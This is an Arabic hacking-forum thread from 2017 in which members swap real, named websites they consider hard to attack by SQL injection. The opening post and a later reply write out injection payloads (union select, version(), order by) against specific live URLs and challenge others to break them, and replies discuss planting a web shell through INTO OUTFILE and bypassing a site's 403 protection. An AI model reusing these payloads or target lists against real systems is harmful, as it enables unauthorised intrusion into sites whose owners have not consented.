TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 22-08-2017, 08:15 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي أصعب المواقع المصابة بثغرات الحقن

السلام عليكم ورحمة الله

نقاش للتطوير

يقابل الحاقن الكثير من المواقع الصعبة الحقن والتى تصل فى بعض الاحيان للإستحالة

السؤال

هل قابلك مواقع مثل تلك تستطيع مشاركتها معنا لنرى مدى الصعوبة بها

المواقع التى أٌشارك بها بالموضوع


كود PHP:
www.goal.az/livescore/tournament/42 and 0 union select 1,2,3,4,5,6,-- -/news/45011
كود PHP:
http://www.mcmilliancounseling.com/viewblog.php?id=6 
كود PHP:
www.tonibreiss.com/order.php?id=
كود PHP:
www.srpskijezik.edu.rs/index.php?id=2100 
هذا الموقع صعب تصفح الاعمده

كود PHP:
http://www.princeofpoets.com/ar/news.php?cat=43' and 0 union/**/distinctrow Select 1,version()-- -&id=230 
هذا الموقع صعب الحقن ولكنى قمت بحقنه بسهولة بخدعه بسيطه
جرب تحقنه وورينا شطارتك

كود PHP:
http://www.res-jo.com/activities.php?id=10 
تحياتي




 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
7 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #2  
قديم 22-08-2017, 08:22 PM
الصورة الرمزية tapot33
tapot33
عضو نشيط
 
حـالة التــواجـد : tapot33 غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 75
شكراً:132
تم شكره 64 مرة في 27 مشاركة
معدل تقييم المستوى: 0
tapot33 بدون تقييم
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

كان ودي أشارك موقع وصلت لمرحله اليأس..

بس ماقدر لأنه حساس  
رد مع اقتباس
  #3  
قديم 22-08-2017, 08:31 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

تنويه ,, ليس كل خطأ ثغرة حقن .. فمثلا الـinput يقبل نوع معين integer وانت تعطيه string فيرجع خطأ ليس بالضرورة يكون مصاب بالحقن.

تم حذف موقع الجامعة لكونه موقع حكومي مصاب ,, واستغلاله يعرضنا للمشاكل  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #4  
قديم 22-08-2017, 08:33 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

اقتباس:
المشاركة الأصلية كتبت بواسطة tapot33 مشاهدة المشاركة

كان ودي أشارك موقع وصلت لمرحله اليأس..

بس ماقدر لأنه حساس
شاركنى بيه على الخاص اشوفه
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
  #5  
قديم 22-08-2017, 08:45 PM
الصورة الرمزية BlackRose-GHT
BlackRose-GHT
عضو نشيط
 
حـالة التــواجـد : BlackRose-GHT غير متواجد حالياً
تاريخ التسجيل: Jan 2017
الجــــنــــــس: ذكـر
المشاركات: 97
شكراً:50
تم شكره 321 مرة في 55 مشاركة
معدل تقييم المستوى: 0
BlackRose-GHT بدون تقييم
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

تنويه ,, ليس كل خطأ ثغرة حقن .. فمثلا الـinput يقبل نوع معين integer وانت تعطيه string فيرجع خطأ ليس بالضرورة يكون مصاب بالحقن.

تم حذف موقع الجامعة لكونه موقع حكومي مصاب ,, واستغلاله يعرضنا للمشاكل
مش مشكلة عزيزي لكن لاتقلق موقع الجامعه لا يمكن إستغلاله للناس العاديين ولا أنصاف المحترفين ولا المحترفين
الموقع لا يمكن حقنة إلا بالحقن xpath وزرع شل into outfile نشرت معرفتي للطريقة مع الصور هذه التى تري ولكني لم أنشر الحل وذلك بعضويتى البريفت فى موقع أشيان الإيراني لذا لا أعرف أحد غيري يستطيع فعلها ^__^






تحياتي وأسف إن عرضت المنتدي للمشاكل بدون قصد
 

 

 

خبير الأمن والحماية ,قائد مشترك مع Dzxsec Vbspiders ( aircrack -ng ) لفريق تطوير مجال حقن قواعد البيانات GHI على مٌستوى الوطن العربى والأٌمة الإسلامية , عضو بفريق غزة هاكر تيم GHT , خبير SQLI لدى HackForums الأمريكيه ,مٌبرمج خبير بـ Black Python ,حاصل على شهادة إختصاص تخريج الحديث الشريف من الجامعه الإسلاميه المفتوحه .

اقتباس:
http://www.sec4ever.com/home/showthread.php?p=101940#post101940
 





رد مع اقتباس
3 أعضاء قالوا شكراً لـ BlackRose-GHT على المشاركة المفيدة:
  #6  
قديم 22-08-2017, 08:58 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

اقتباس:
المشاركة الأصلية كتبت بواسطة BlackRose-GHT مشاهدة المشاركة

مش مشكلة عزيزي لكن لاتقلق موقع الجامعه لا يمكن إستغلاله للناس العاديين ولا أنصاف المحترفين ولا المحترفين
الموقع لا يمكن حقنة إلا بالحقن xpath وزرع شل into outfile نشرت معرفتي للطريقة مع الصور هذه التى تري ولكني لم أنشر الحل وذلك بعضويتى البريفت فى موقع أشيان الإيراني لذا لا أعرف أحد غيري يستطيع فعلها ^__^






تحياتي وأسف إن عرضت المنتدي للمشاكل بدون قصد
ممكن تشرح اكثر حول زرع شل؟



الحقن عادي error والنتيجة قاعدة البيانات كما في الصورة.
يعني ليس بالشيء الصعب ولا الخرافي مع العلم انه تم حقنه قبل اكثر من سنتين.  
رد مع اقتباس
2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #7  
قديم 22-08-2017, 09:06 PM
الصورة الرمزية lovl
lovl
عضو نشيط
 
حـالة التــواجـد : lovl غير متواجد حالياً
تاريخ التسجيل: Dec 2013
الجــــنــــــس: ذكـر
المشاركات: 36
شكراً:343
تم شكره 10 مرة في 7 مشاركة
معدل تقييم المستوى: 0
lovl بدون تقييم
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

لدي موقع لم استطع استخراج الاعمدة المصابة بسبب الفوربيدن
كود PHP:
http://arabic.irib.ir/index3.php?option=com_baramej&task=print&id=9922+order+by+6-- 
ي ليت تتخطى وتشرح لنا كيفية التخطي وشكرا لك على م تقدمه من دروس اكثر من رائعه وجزاك الله خير  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ lovl على المشاركة المفيدة:
  #8  
قديم 22-08-2017, 09:25 PM
الصورة الرمزية ww9k
ww9k
عضو مميز
 
حـالة التــواجـد : ww9k غير متواجد حالياً
تاريخ التسجيل: Feb 2011
الجــــنــــــس: ذكـر
المشاركات: 235
شكراً:150
تم شكره 183 مرة في 66 مشاركة
معدل تقييم المستوى: 9
ww9k على طريق التميز
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

رائع جداً ، بدون مجامله انت المحرك الرئيسي بدون منافس للنهوض بمنتديات هكر العرب مجدداً بعد فترة الخمول

وددت ان اشارك لكن لظروف السفر ، لكن حرصت على ان اعبر عن امتناني وشكري ، وان ماتفعله لوجه الله يتوجب شكرك حقيقه .


بارك الله في دنياك واخرتك و اطال عمرك على طاعته . ( من متابعينك بالفيس بوك دوماً ) .  

 

 

https://twitter.com/s2p
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ww9k على المشاركة المفيدة:
  #9  
قديم 22-08-2017, 09:30 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,672
شكراً:4,473
تم شكره 5,468 مرة في 1,365 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

اقتباس:
المشاركة الأصلية كتبت بواسطة lovl مشاهدة المشاركة

لدي موقع لم استطع استخراج الاعمدة المصابة بسبب الفوربيدن
كود PHP:
http://arabic.irib.ir/index3.php?option=com_baramej&task=print&id=9922+order+by+6-- 
ي ليت تتخطى وتشرح لنا كيفية التخطي وشكرا لك على م تقدمه من دروس اكثر من رائعه وجزاك الله خير


ابحث أكثر عن تخطي الفوربدن لأن اول تجربة بعد البحث راح تتخطاه.

ملاحظة:
اذا رأينا ان الموضوع سيتجه لغرفة حقن بدل مناقشة الأهم وهي مراحل تخطي الحماية ,, فهذا غير مقبول خصوصا ان المواقع تقريبا كلها عربية.  
رد مع اقتباس
4 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #10  
قديم 22-08-2017, 10:00 PM
الصورة الرمزية Murtada Al-iRaQi
Murtada Al-iRaQi
عضو مميز
 
حـالة التــواجـد : Murtada Al-iRaQi غير متواجد حالياً
تاريخ التسجيل: Sep 2015
مكـان الإقامـة : Home
الجــــنــــــس: ذكـر
الــهـــوايـــــة: Attacking
المشاركات: 119
شكراً:194
تم شكره 72 مرة في 43 مشاركة
معدل تقييم المستوى: 0
Murtada Al-iRaQi بدون تقييم
افتراضي رد: أصعب المواقع المصابة بثغرات الحقن

اصعب موقع واجهته هو
الحقن في input اليوزر
وجدت عدد الاعمدة الي هو 6
ولاكن لم استطع ايجاد الاعمدة المصابة
بالتوفيق للجميع  

 

 

Murtada Kamil
Bug Hunter
رد مع اقتباس


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 04:47 PM